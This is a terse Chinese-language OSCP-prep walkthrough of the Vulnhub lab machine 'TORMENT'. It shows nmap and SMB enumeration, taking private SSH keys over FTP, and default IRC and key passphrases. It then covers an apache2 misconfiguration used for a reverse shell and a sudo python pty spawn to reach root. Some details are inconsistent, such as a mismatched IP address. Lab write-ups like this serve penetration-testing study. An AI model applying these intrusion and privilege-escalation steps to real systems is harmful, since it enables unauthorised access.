OSCP备考_0x23_Vulnhub靶机_digitalworld.local: TORMENT
名称 | 说明 |
---|---|
靶机下载链接 | https://www.vulnhub.com/entry/digitalworldlocal-torment,299/ |
攻击机(kali) | ip:192.168.233.168 |
靶机(CentOS) | ip:192.168.233.189 |
arp-scan 192.168.233.1/24
nmap -p- 192.168.233.189
nmap -p21,22,25,80,111,139,143,445,631,2049,6667,6668,6669,6672 -A -sV -T5 192.168.233.189
先登入到FTP看有啥资料可以获取
ls -al
获取.ngircd底下的channels和.ssh底下的私钥
安装hexchat访问目标系统
sudo apt-get update
apt install
hexchat
输入目标系统IP地址,但是没有密码。
80端口,通过目录爆破也没什么有用的东西192.168.233.189
然后去访问631端口的同时在对smb进行共享组枚举
sudo nmap -p 139,445 --script=smb-enum-shares 192.168.233.189
虽然有一个backuo的共享组,但是并不能访问
http://192.168.233.189:631/printers/
这名字应该都是有用的把他获取出来去登入看看
curl -s http://192.168.220.157:631/printers/ | grep Personal | awk -F "=" '{print$2}'|cut -d "/" -f3|cut -d ";" -f1 | cut -d "&" -f1
连接不上
经搜索ngircd是个免费,便携式且轻便的Internet中继聊天服务器
sudo apt-get install hexchat
于是我在网上搜索了ngircd配置文件,得到了一个默认密码:wealllikedebian
password "mostmachineshaveasupersecurekeyandalongpassphrase".
然后再发现使用find / -perm 777 -type f 2</dev/null
apache2是有root执行权限的 将qiu进行反弹
设置User qiu 然后执行后门的时后就会反弹这用户权限
然后查看sudo -l
有python权限那直接反弹SHELL就可以获取root
sudo python -c 'import pty;pty.spawn("/bin/bash")'